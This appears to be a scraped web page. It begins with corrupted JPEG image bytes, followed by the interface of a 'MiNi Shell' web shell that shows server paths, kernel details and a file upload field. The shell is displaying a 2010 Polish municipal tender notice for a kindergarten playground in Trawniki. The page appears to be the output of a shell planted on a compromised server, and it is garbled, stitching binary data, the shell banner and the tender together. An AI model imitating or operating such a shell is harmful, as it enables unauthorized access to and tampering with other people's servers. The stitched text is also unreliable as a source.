JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100624/165133-N-2010.html

<p class="kh_header"><b>Trawniki: Wykonanie placu zabaw wraz z dostawą i montażem wyposażenia na terenie Przedszkola Zespołu Placówek Oświatowych im. Marii Skłodowskiej-Curie w Trawnikach</b><br>
<b>Numer ogłoszenia: 165133 - 2010; data zamieszczenia: 24.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Trawniki , Trawniki 605, 21-044 Trawniki, woj. lubelskie, tel. 081 5856018, faks 081 5856018.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.trawniki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie placu zabaw wraz z dostawą i montażem wyposażenia na terenie Przedszkola Zespołu Placówek Oświatowych im. Marii Skłodowskiej-Curie w Trawnikach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest wykonanie placu zabaw zgodnie z dokumentacją, specyfikacją techniczną wykonania i odbioru robót, przedmiarem robót stanowiącym załącznik do siwz.
2) Zamówienie obejmuje demontaż istniejącego wyposażenia placu zabaw z wyjątkiem dużej murowanej piaskownicy która podlegać będzie modernizacji, dodatkowo rozbiórce podlegać będzie istniejąca nawierzchnia betonowa chodnika i wykonanie nowej nawierzchni z kostki brukowej.
Wyposażenie placu zabaw obejmuje:
a) regulamin placu zabaw przygotowany i zatwierdzony przez Dyrekcję Przedszkola - 1 szt.;
b) zestaw centralny wykonany z impregnowanego drewna iglastego. W skład zestawu powinny wejść cztery zadaszone wieże z pomostami i różnego rodzaju trapami, zjeżdżalnia głęboka, zjeżdżalnia dla mniejszych dzieci, np. ZESTAW  ZAMEK  firmy NOVUM - 1 kpl.;
W skład przykładowego zestawu wchodzą:
- wieża z dachem dwuspadowym,
- wieża duża,
- wieża z dachem kopertowym,
- wieża z dachem kopertowym z lukarnami,
- zabezpieczenie sklejkowe 2 szt.
- zjeżdżalnia głęboka,
- zjeżdżalnia dla maluchów,
- rura strażacka,
- trap schodki,
- trap drabinka,
- trap wspinaczkowy,
- pomost ruchomy,
- pomost wiszący,
- pomost z klockami.
c) zestaw wielofunkcyjny wykonany z impregnowanego drewna iglastego, w formie sześciokąta wyposażonego w zróżnicowane stalowe drabinki, uchwyt na łańcuchach i pionowy pręt, umożliwiające ćwiczenia gimnastyczne i zręcznościowe, np. SZEŚCIOKĄT  WIELOFUNKCYJNY  firmy NOVUM - 1 szt.;
d) lokomotywa z wagonem wykonana z impregnowanego drewna iglastego. W lokomotywie należy przewidzieć zadaszone miejsca stojące dla obsługi (maszynista i pomocnik), zaś w wagonie obustronne lub jednostronne ławki z oparciami dla pasażerów, np. LOKOMOTYWA  Z  WAGONEM  firmy  NOVUM - 1 kpl. ;
e) piaskownica z siedziskiem. Projektuje się utrzymanie istniejącej na placu stałej piaskownicy, o bokach murowanych z cegły silikatowej. Siedzisko o szerokości 30 cm należy wykonać z impregnowanych desek grubości 35 mm z drewna iglastego lub z wodoodpornej sklejki, mocowanych do muru ;
f) altana w formie sześciokąta z dachem brogowym z tworzywa sztucznego lub wodoodpornej sklejki, wspartym na oczepach i sześciu słupach z impregnowanego drewna iglastego. Altana powinna być wyposażona w centralnie usytuowany drewniany stół oraz drewniane ławki z oparciem, rozmieszczone wzdłuż ścian zewnętrznych, np. ALTANA  zestawu nr 18 firmy ACTIV, Poznań, ul. Biedronki 41, Skórzewo  - 1 kpl. ; 
g) huśtawka podwójna o konstrukcji stalowo-drewnianej z siedziskami drewnianymi zawieszonymi na łańcuchach do stalowej belki. Słupy z impregnowanego drewna iglastego wsparte na stalowych łącznikach,  kotwionych w  prefabrykowanych elementach betonowych stanowiących fundament, np. HUŚTAWKA  PODWÓJNĄ  Z  BELKĄ  STALOWĄ  firmy NOVUM - 1 szt. ;
h) huśtawka ważka  w postaci drewnianego ruchomego elementu z impregnowanego drewna iglastego z siedziskami i uchwytami bezpieczeństwa na obu końcach, wsparta na stalowej podstawie kotwionej w  prefabrykowanych elementach betonowych stanowiących fundament, np. HUŚTAWKA  WAŻKA  NA  PODSTAWIE  METALOWEJ  firmy NOVUM - 2 szt. ;
i) karuzela tarczowa stojąca o konstrukcji wykonanej z elementów stalowych. Podest pokryty ryflowaną blachą  aluminiową. Stalowy słupek centralny zakotwiony w prefabrykowanym elemencie betonowym, stanowiącym fundament, np. KARUZELA  TARCZOWA O120 firmy NOVUM - 1 szt. ;
j) sprężynowiec słoń, wykonany z wodoodpornej sklejki, z siedziskiem umieszczonym na stalowej sprężynie, zakotwionej w prefabrykowanym elemencie betonowym, stanowiącym fundament, np. SŁOŃ firmy NOVUM - 1 szt. ;
k) sprężynowiec żaba, wykonany z wodoodpornej sklejki, z siedziskiem umieszczonym na stalowej sprężynie, zakotwionej w prefabrykowanym elemencie betonowym, stanowiącym fundament, np. ŻABA firmy NOVUM - 1 szt. ;
l) sprężynowiec skuter, wykonany z wodoodpornej sklejki, z siedziskiem umieszczonym na stalowej sprężynie, zakotwionej w prefabrykowanym elemencie betonowym, stanowiącym fundament, np. SKUTER firmy NOVUM - 1 szt. ;
m) sprężynowiec konik, wykonany z wodoodpornej sklejki, z siedziskiem umieszczonym na stalowej sprężynie, zakotwionej w prefabrykowanym elemencie betonowym, stanowiącym fundament, np. KONIK firmy NOVUM - 1 szt. ; 
n) przenośna ławka z oparciem wykonana z impregnowanego drewna iglastego, np. ŁAWKA  Z  BALI  PRZENOŚNA  Z  OPARCIEM  firmy NOVUM - 5 szt. ; 
o) Kosz na śmieci wykonany z impregnowanego drewna iglastego o średnicy minimum 45 cm i wysokości 100cm, np. KOSZ  NA  ŚMIECI  Z  PÓŁWAŁKÓW  firmy NOVUM - 3 szt. ; 
p) kosz do piłki koszykowej mocowany  na wysokości 205 cm do stalowego słupa o średnicy minimum 100 mm,. Słup posadowiony na fundamencie betonowym,  np. SŁUP  Z  KOSZEM  NISKIM  firmy NOVUM - 1 szt.
Wszystkie urządzenia  zainstalowane na projektowanym placu zabaw muszą mieć jednolity charakter kolorystyczny.
Poza elementami urządzeń, zabezpieczonych transparentnymi impregnatami olejowymi np. belki nośne, podesty - inne elementy, określone przez Wykonawcę - muszą być barwione kolorem, przy czym wymagane jest zastosowanie co najmniej trzech kolorów, np. zielone wszystkie daszki, czerwone boki, żółte poręcze itp.
Wszystkie urządzenia  zainstalowane na projektowanym placu zabaw powinny być wykonane  zgodnie z obowiązującymi normami Unii Europejskiej EN 1176-1/1998 - Place zabaw dla dzieci Wymogi bezpieczeństwa i sposoby testowania, których polskim odpowiednikiem jest norma PN-EN 1176-1 Wyposażenie placów zabaw. Część 1: Ogólne wymagania bezpieczeństwa i metody badań, co potwierdzają odpowiednie CERTYFIKATY ZGODNOŚCI wydane przez Urząd Dozoru Technicznego UDT-CERT. Wszystkie wskazane przykładowo urządzenia spełniają  te wymogi.

Uwaga! Do realizacji zamówienia mogą zostać wybrane urządzenia produkowane przez inne firmy. Wybrane urządzenia muszą być zgodne z zaleceniami niniejszego projektu, wymogami specyfikacji technicznej wykonania i odbioru robót związanych z przygotowaniem placu zabaw oraz powinny  posiadać aktualne certyfikaty i aprobaty techniczne. W przypadku zastosowania przez wykonawcę materiałów i urządzeń równoważnych, Wykonawca zobowiązany jest przedstawić wraz z oferta szczegółowa specyfikacje, z której w sposób nie budzący wątpliwości Zamawiającego powinno wynikać, że zaoferowany asortyment jest o takich samych lub lepszych parametrach technicznych w odniesieniu do asortymentu określonego przez zamawiającego w opisie przedmiotu zamówienia.
Wykonawca zobowiązany jest do przedstawienia w ofercie zdjęć/rysunków proponowanych do zamontowania na placu zabaw urządzeń.
Urządzenia należy  rozmieścić i zamontować tak, aby zachować wymagane strefy bezpieczeństwa, zapewnić ciągi komunikacyjne dla bawiących się dzieci oraz możliwość wymiany piasku w piaskownicy.
Montaż poszczególnych urządzeń powinien być dokonany wyłącznie przez wyspecjalizowane ekipy montażowe, w sposób gwarantujący pełne bezpieczeństwo użytkowania. 
Szczególną uwagę należy zwrócić na prawidłowe mocowanie poszczególnych urządzeń do podłoża, zgodne z obowiązującymi w tym względzie wymogami i reżimem technologicznym producenta.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 45.11.27.23-9, 45.23.32.22-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie oświadczenia złożonego przez Wykonawcę</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca do realizacji przedmiotu zamówienia, wykaże że w okresie trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia wykonał min. 2 inwestycje związane z wykonaniem placu zabaw wraz z dostawą i montażem wyposażenia na tym placu o wartości co najmniej 60 tys. złotych każda z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Do wykazu należy dołączyć dokumenty poświadczające wykonanie usługi należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie oświadczenia złożonego przez Wykonawcę</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie oświadczenia złożonego przez Wykonawcę</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie oświadczenia złożonego przez wykonawcę oraz dodatkowo Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne są następujące rodzaje i warunki zmiany treści umowy:
1) zmniejszenie zakresu przedmiotu zamówienia, gdy jego wykonanie w pierwotnym zakresie nie leży w interesie Zamawiającego,
2) zmiana materiałów, sprzętu, urządzeń, gdy wykorzystanie materiałów, sprzętu, urządzeń wskazanych w dokumentacji lub ofercie stanie się niemożliwe bądź podyktowane będzie usprawnieniem procesu montażu, zasadami wiedzy technicznej, zwiększeniem bezpieczeństwa lub wynikać z przepisów.
3) wykonanie prac zamiennych, gdy wykonanie prac wskazanych w dokumentacji projektowej lub ofercie stanie się niemożliwe bądź podyktowane będzie usprawnieniem procesu montażu, zasadami wiedzy technicznej, zwiększeniem bezpieczeństwa lub wynikać z przepisów
4) zmiana terminu realizacji przedmiotu zamówienia, w przypadku:
a) gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego,
b) działania siły wyższej, uniemożliwiającego wykonanie prac w określonym pierwotnie terminie,
c) zaistnienia niesprzyjających warunków atmosferycznych, uniemożliwiających wykonywanie prac lub spełnienie wymogów technologicznych,
d) przerwy w dostawie prądu, wody trwającej ponad 7 dni,
e) konieczności zmiany ilości prac w stosunku do ilości określonych w przedmiarze robót, 
f) konieczności zmniejszenia zakresu przedmiotu zamówienia, gdy jego wykonanie w pierwotnym zakresie nie leży w interesie Zamawiającego,
g) wydłużenia terminów dostaw materiałów z przyczyn niezależnych od Wykonawcy,
h) błędów w dokumentacji projektowej, których usunięcie będzie wymagało konsultacji z projektantem i naniesienia przez niego poprawek lub zmian w projekcie trwających ponad 7 dni,
5) Powierzenie Podwykonawcy określonego zakresu robót na skutek którejkolwiek z okoliczności wskazanych w pkt 2 i 3 niniejszego ustępu.
Zmiana umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważność.
Rozszerzenie opisanych powyżej dopuszczalnych zmian znajduje się we wzorze umowy stanowiącej załącznik do specyfikacji istotnych warunków umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ugtrawniki.bip.e-zeto.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Trawniki, Trawniki 605, 21-044 Trawniki, pokój nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.07.2010 godzina 09:00, miejsce: Urząd Gminy Trawniki, Trawniki 605, 21-044 Trawniki, pokój nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com